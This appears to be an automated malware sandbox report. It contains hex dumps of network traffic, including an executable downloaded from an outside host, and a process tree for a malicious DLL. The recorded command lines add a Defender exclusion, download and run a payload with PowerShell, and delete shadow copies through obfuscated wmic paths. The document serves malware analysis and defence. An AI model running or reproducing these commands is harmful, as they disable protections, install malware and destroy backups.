                                                                                                    2024-12-15 08:27:37 UTC16384INData Raw: 8d 14 fb ff ff 8b 85 00 fb ff ff 47 57 89 bd 48 e7 ff ff 8b 40 04 03 c8 8b 01 25 ff f9 ff ff 0d 00 08 00 00 89 01 8d 8d 00 fb ff ff e8 fc 91 00 00 8d 45 b8 50 8d 8d f0 fa ff ff e8 2d 64 00 00 6a 5c 8d 85 88 fe ff ff c6 45 fc 0e 6a 00 50 e8 29 2c 05 00 83 c4 0c 8d 8d 88 fe ff ff e8 7b 52 00 00 c7 85 70 ff ff ff 00 00 00 00 c7 45 80 00 00 00 00 c7 45 84 0f 00 00 00 c6 85 70 ff ff ff 00 c6 45 fc 10 8b 8d 90 fe ff ff ff 35 00 60 4b 00 6a 10 8b 01 ff b5 24 ff ff ff ff 50 18 8d 8d 88 fe ff ff e8 b4 41 03 00 6a 78 e8 87 0b 05 00 8b f8 83 c4 04 89 bd 44 e7 ff ff 6a 78 6a 00 57 c6 45 fc 11 e8 b4 2b 05 00 83 c4 0c 6a 10 e8 64 0b 05 00 8b f0 83 c4 04 89 b5 50 e7 ff ff 0f 57 c0 c6 45 fc 12 6a 00 8b ce 0f 11 06 e8 7c 50 01 00 8d 85 70 ff ff ff c7 06 18 dd 48 00 c7 46
                                                                                                    Data Ascii: GWH@%EP-dj\EjP),{RpEEpE5`Kj$PAjxDjxjWE+jdPWEj|PpHF
                                                                                                    2024-12-15 08:27:37 UTC16384INData Raw: ff ff c6 45 fc 13 e8 92 55 00 00 68 b8 55 4a 00 8d 8d 88 fe ff ff e8 e2 55 00 00 8d 85 88 fe ff ff c6 45 fc 2c 50 8d 4d e4 e8 5f 0d 00 00 8d 8d 88 fe ff ff c6 45 fc 13 e8 60 55 00 00 68 c0 55 4a 00 8d 8d 88 fe ff ff e8 b0 55 00 00 8d 85 88 fe ff ff c6 45 fc 2d 50 8d 4d e4 e8 2d 0d 00 00 8d 8d 88 fe ff ff c6 45 fc 13 e8 2e 55 00 00 8d 4d e4 33 f6 e8 f4 0c 00 00 85 c0 74 6b ba c8 55 4a 00 b9 38 cf 4b 00 e8 e1 96 00 00 50 e8 fb 9e 00 00 83 ec 14 8d 45 9c 8b cc 89 a5 84 fe ff ff 50 e8 47 57 00 00 83 ec 40 c6 45 fc 2e 8b cc 8d 85 fc fe ff ff 6a 01 50 e8 c0 8b ff ff 56 8d 4d e4 e8 87 0c 00 00 8b c8 e8 c0 54 00 00 8b c8 c6 45 fc 13 e8 85 d3 ff ff 83 c4 58 8d 4d e4 46 e8 89 0c 00 00 3b f0 72 95 8d 8d a0 fe ff ff e8 7a 00 00 00 8d 4d b4 e8 f2 0b 00 00 8d 4d 84 e8
                                                                                                    Data Ascii: EUhUJUE,PM_E`UhUJUE-PM-E.UM3tkUJ8KPEPGW@E.jPVMTEXMF;rzMM
                                                                                                    2024-12-15 08:27:37 UTC16384INData Raw: c7 45 fc 01 00 00 00 84 c0 74 79 8b 45 10 85 c0 7c 72 8b 5d 0c 7f 04 85 db 74 69 c6 45 fc 02 50 8b 06 53 ff 75 08 8b 48 04 8b 4c 31 38 e8 8b 35 00 00 89 46 08 89 56 0c 3b c3 75 05 3b 55 10 74 3c bf 03 00 00 00 eb 35 8b 4d ec 6a 01 8b 01 8b 70 04 b8 04 00 00 00 03 f1 33 c9 8b 56 0c 83 ca 04 39 4e 38 0f 45 c1 8b ce 0b c2 50 e8 6c d7 fe ff b8 7a 4b 41 00 c3 8b 75 ec 8b 7d e8 c7 45 fc 01 00 00 00 8b 06 6a 00 8b 48 04 b8 04 00 00 00 03 ce 8b 51 0c 0b d7 33 ff 39 79 38 0f 45 c7 0b c2 50 e8 36 d7 fe ff c7 45 fc 04 00 00 00 8b 06 8b 40 04 8b 4c 30 38 85 c9 74 05 8b 01 ff 50 08 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 0c 00 cc cc cc cc cc cc cc 8b 41 e8 8b 40 04 c7 44 08 e8 f4 5e 4a 00 8b 41 e8 8b 50 04 8d 42 e8 89 44 0a e4 c3 cc cc cc cc 55 8b
                                                                                                    Data Ascii: EtyE|r]tiEPSuHL185FV;u;Ut<5Mjp3V9N8EPlzKAu}EjHQ39y8EP6E@L08tPMdY_^[]A@D^JAPBDU
                                                                                                    2024-12-15 08:27:37 UTC16384INData Raw: 1a 0f b6 c3 eb 0b 8b 16 8b ce 0f b6 c3 50 ff 52 0c 8b 75 14 83 f8 ff 75 04 c6 45 10 01 83 ef 01 75 bb 8b 45 fc 5b 8b 4d 10 5f 89 70 04 89 08 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 8b 45 0c 53 8b 5d 18 56 8b 75 14 57 8b 7d 1c 89 45 f8 85 ff 74 55 0f 1f 40 00 85 f6 74 40 8b 46 20 8a 0b 88 4d ff 83 38 00 74 20 8b 56 30 8b 02 85 c0 7e 17 48 89 02 8b 4e 20 8b 11 8d 42 01 89 01 8a 45 ff 88 02 0f b6 c0 eb 0b 8b 16 0f b6 c1 8b ce 50 ff 52 0c 8b 75 14 83 f8 ff 75 04 c6 45 10 01 43 83 ef 01 75 b2 8b 45 f8 8b 4d 10 5f 89 70 04 5e 89 08 5b 8b e5 5d c3 55 8b ec 6a ff 68 e5 55 48 00 64 a1 00 00 00 00 50 83 ec 4c a1 34 61 4b 00 33 c5 89 45 f0 53 56 57 50 8d 45 f4 64 a3 00 00 00 00 8b 7d 24 8b 45 0c 8b 4d 18 8b 5d 20 89 45 a8 89 4d ac 85 ff 74 11 8a
                                                                                                    Data Ascii: PRuuEuE[M_p^]UES]VuW}EtU@t@F M8t V0~HN BEPRuuECuEM_p^[]UjhUHdPL4aK3ESVWPEd}$EM] EMt
                                                                                                    2024-12-15 08:27:37 UTC16384INData Raw: 57 50 e8 f6 26 04 00 8b 45 f8 83 c4 0c 89 43 10 8b c3 5f 5e 5b 8b e5 5d c2 0c 00 8b 45 fc 2b c8 3b d1 77 59 0f 10 07 40 50 0f 11 03 f3 0f 7e 47 10 66 0f d6 43 10 c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 8b 3b 57 8d 04 17 50 e8 aa 26 04 00 83 c4 0c 83 7e 14 10 72 02 8b 36 8b 4d f4 51 56 57 e8 94 26 04 00 8b 45 f8 83 c4 0c 89 43 10 8b c3 5f 5e 5b 8b e5 5d c2 0c 00 b8 ff ff ff 7f 2b c2 3b 45 fc 0f 82 c0 00 00 00 8b 45 f8 83 c8 0f 3d ff ff ff 7f 76 07 b8 ff ff ff 7f eb 0a b9 16 00 00 00 3b c1 0f 42 c1 33 c9 89 45 ec 83 c0 01 0f 92 c1 f7 d9 0b c8 81 f9 00 10 00 00 72 26 8d 41 23 3b c1 0f 86 85 00 00 00 50 e8 64 0b 04 00 83 c4 04 85 c0 74 7d 8b 55 f4 8d 48 23 83 e1 e0 89 41 fc eb 19 85 c9 74 13 51 e8 45 0b 04 00 8b 55 f4 83 c4 04 8b c8 89 45 f0 eb 05
                                                                                                    Data Ascii: WP&EC_^[]E+;wY@P~GfCGG;WP&~r6MQVW&EC_^[]+;EE=v;B3Er&A#;Pdt}UH#AtQEUE
                                                                                                    2024-12-15 08:27:37 UTC16384INData Raw: e8 08 9d 00 00 8b 4d dc 8b 01 ff 50 0c ff 75 d8 8b 4d ec 8b f0 ff 75 d4 8b 3e e8 7e 09 00 00 50 ff 75 f0 8b ce ff 75 e8 ff 57 10 8b 55 c8 39 55 c4 8b 75 cc 8b fe 0f 42 55 c4 33 c0 c6 45 fc 0d 8b ca f3 ab 56 85 d2 74 07 e8 ef a3 02 00 eb 05 e8 58 a4 02 00 83 c4 04 8b 55 f0 32 c0 8b fa c7 45 fc 0e 00 00 00 8b cb f3 aa 52 e8 3d a4 02 00 8b 45 e8 83 c4 04 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b 8d e8 00 00 00 33 cd e8 7e c9 03 00 8d a5 ec 00 00 00 5d c2 18 00 8b 03 6a 0a ff 50 10 50 8d 85 d0 00 00 00 50 e8 2e f7 ff ff 8b f8 6a 0a 8d 85 90 00 00 00 c7 45 fc 00 00 00 00 56 50 e8 16 f7 ff ff 83 c4 18 8b f0 8b 43 04 8d 4b 04 8d 55 78 c6 45 fc 01 52 ff 50 08 68 b0 bb 48 00 50 8d 45 60 c6 45 fc 02 50 e8 5d 9a ff ff 56 50 8d 45 48 c6 45 fc 03 50 e8 9e 9a ff ff
                                                                                                    Data Ascii: MPuMu>~PuuWU9UuBU3EVtXU2ER=EMdY_^[3~]jPPP.jEVPCKUxERPhHPE`EP]VPEHEP
                                                                                                    2024-12-15 08:27:37 UTC16384INData Raw: 00 00 00 85 c9 74 06 8b 01 6a 01 ff 10 89 77 04 88 5f 08 8b 75 08 8b ce 57 c6 45 fc 00 e8 9b e9 01 00 8b 4d e8 c7 45 fc 03 00 00 00 85 c9 74 06 8b 11 6a 01 ff 12 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 cc cc cc 56 8b f1 e8 d8 11 fe ff f6 44 24 08 01 74 0b 6a 14 56 e8 54 8e 03 00 83 c4 08 8b c6 5e c2 04 00 f6 44 24 04 01 56 8b f1 c7 06 7c bc 48 00 74 0b 6a 0c 56 e8 33 8e 03 00 83 c4 08 8b c6 5e c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 57 68 08 72 4b 00 68 20 6c 4b 00 8b f1 e8 f6 a2 03 00 8b 7c 24 1c 83 c4 08 85 c0 75 15 8d 46 10 50 57 ff 74 24 18 e8 04 29 00 00 83 c4 0c 84 c0 75 1a ff 74 24 10 68 1c 6c 4b 00 ff 74 24 14 e8 fb 03 fe ff 8a 46 10 83 c4 0c 88 07 5f 5e c2 0c 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 57
                                                                                                    Data Ascii: tjw_uWEMEtjMdY_^[]VD$tjVT^D$V|HtjV3^VWhrKh lK|$uFPWt$)ut$hlKt$F_^VW


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.84970745.125.67.1684433352C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-15 08:27:35 UTC176OUTGET /stelin/Gosjeufon.cpl HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                    Host: kiltone.top
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-12-15 08:27:36 UTC253INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0
                                                                                                    Date: Sun, 15 Dec 2024 08:27:36 GMT
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Length: 902856
                                                                                                    Last-Modified: Fri, 13 Dec 2024 23:58:00 GMT
                                                                                                    Connection: close
                                                                                                    ETag: "675cca08-dc6c8"
                                                                                                    Accept-Ranges: bytes
                                                                                                    2024-12-15 08:27:36 UTC16131INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 84 7b 68 8b c0 1a 06 d8 c0 1a 06 d8 c0 1a 06 d8 b3 78 05 d9 d2 1a 06 d8 b3 78 03 d9 72 1a 06 d8 b3 78 02 d9 d7 1a 06 d8 92 6f 02 d9 d1 1a 06 d8 92 6f 05 d9 d8 1a 06 d8 92 6f 03 d9 9f 1a 06 d8 0a 6f 03 d9 e9 1a 06 d8 b3 78 00 d9 c1 1a 06 d8 b3 78 07 d9 cf 1a 06 d8 c0 1a 07 d8 71 1a 06 d8 0a 6f 0f d9 c1 1a 06 d8 0a 6f f9 d8 c1 1a 06 d8 c0 1a 91 d8 c1 1a 06 d8 0a 6f 04 d9 c1 1a 06
                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.${hxxrxooooxxqooo


                                                                                                    Click to jump to process

                                                                                                    Click to jump to process

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Click to jump to process

                                                                                                    Target ID:0
                                                                                                    Start time:03:27:22
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\loaddll32.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:loaddll32.exe "C:\Users\user\Desktop\TD2HjoogPx.dll"
                                                                                                    Imagebase:0x460000
                                                                                                    File size:126'464 bytes
                                                                                                    MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    Target ID:2
                                                                                                    Start time:03:27:22
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    Target ID:3
                                                                                                    Start time:03:27:22
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\TD2HjoogPx.dll",#1
                                                                                                    Imagebase:0xa40000
                                                                                                    File size:236'544 bytes
                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:4
                                                                                                    Start time:03:27:22
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\TD2HjoogPx.dll",#1
                                                                                                    Imagebase:0xfc0000
                                                                                                    File size:61'440 bytes
                                                                                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:5
                                                                                                    Start time:03:27:27
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
                                                                                                    Imagebase:0xa40000
                                                                                                    File size:236'544 bytes
                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:6
                                                                                                    Start time:03:27:27
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
                                                                                                    Imagebase:0xa40000
                                                                                                    File size:236'544 bytes
                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:7
                                                                                                    Start time:03:27:27
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
                                                                                                    Imagebase:0xbb0000
                                                                                                    File size:433'152 bytes
                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:8
                                                                                                    Start time:03:27:27
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:9
                                                                                                    Start time:03:27:27
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
                                                                                                    Imagebase:0xbb0000
                                                                                                    File size:433'152 bytes
                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:10
                                                                                                    Start time:03:27:30
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                    Imagebase:0x7ff605670000
                                                                                                    File size:496'640 bytes
                                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:11
                                                                                                    Start time:03:27:32
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
                                                                                                    Imagebase:0xa40000
                                                                                                    File size:236'544 bytes
                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:12
                                                                                                    Start time:03:27:32
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
                                                                                                    Imagebase:0xa40000
                                                                                                    File size:236'544 bytes
                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:13
                                                                                                    Start time:03:27:32
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:14
                                                                                                    Start time:03:27:32
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
                                                                                                    Imagebase:0xbb0000
                                                                                                    File size:433'152 bytes
                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:15
                                                                                                    Start time:03:27:32
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
                                                                                                    Imagebase:0xbb0000
                                                                                                    File size:433'152 bytes
                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:16
                                                                                                    Start time:03:27:36
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:cmd /c %temp%/eryy65ty.exe
                                                                                                    Imagebase:0xa40000
                                                                                                    File size:236'544 bytes
                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:17
                                                                                                    Start time:03:27:36
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:19
                                                                                                    Start time:03:27:38
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:cmd /c %temp%/eryy65ty.exe
                                                                                                    Imagebase:0xa40000
                                                                                                    File size:236'544 bytes
                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:20
                                                                                                    Start time:03:27:38
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp/eryy65ty.exe
                                                                                                    Imagebase:0xe30000
                                                                                                    File size:902'856 bytes
                                                                                                    MD5 hash:9049FABA5517305C44BD5F28398FB6B9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                    • Detection: 45%, ReversingLabs
                                                                                                    • Detection: 67%, Virustotal, Browse
                                                                                                    Has exited:false

                                                                                                    Target ID:22
                                                                                                    Start time:03:27:43
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:c:\SYeXIP\SYeX\..\..\Windows\SYeX\SYeX\..\..\system32\SYeX\SYeX\..\..\wbem\SYeX\SYeXI\..\..\wmic.exe shadowcopy delete
                                                                                                    Imagebase:0x7ff7ceca0000
                                                                                                    File size:576'000 bytes
                                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:23
                                                                                                    Start time:03:27:43
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:27
                                                                                                    Start time:03:27:55
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
                                                                                                    Imagebase:0xe30000
                                                                                                    File size:902'856 bytes
                                                                                                    MD5 hash:9049FABA5517305C44BD5F28398FB6B9
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:28
                                                                                                    Start time:03:28:00
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:c:\xGRceo\xGRc\..\..\Windows\xGRc\xGRc\..\..\system32\xGRc\xGRc\..\..\wbem\xGRc\xGRce\..\..\wmic.exe shadowcopy delete
                                                                                                    Imagebase:0x7ff7ceca0000
                                                                                                    File size:576'000 bytes
                                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:29
                                                                                                    Start time:03:28:00
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:30
                                                                                                    Start time:03:28:03
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
                                                                                                    Imagebase:0xe30000
                                                                                                    File size:902'856 bytes
                                                                                                    MD5 hash:9049FABA5517305C44BD5F28398FB6B9
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:32
                                                                                                    Start time:03:28:07
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:33
                                                                                                    Start time:03:28:09
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:c:\ZiHrdF\ZiHr\..\..\Windows\ZiHr\ZiHr\..\..\system32\ZiHr\ZiHr\..\..\wbem\ZiHr\ZiHrd\..\..\wmic.exe shadowcopy delete
                                                                                                    Imagebase:0x7ff7ceca0000
                                                                                                    File size:576'000 bytes
                                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:34
                                                                                                    Start time:03:28:09
                                                                                                    Start date:15/12/2024
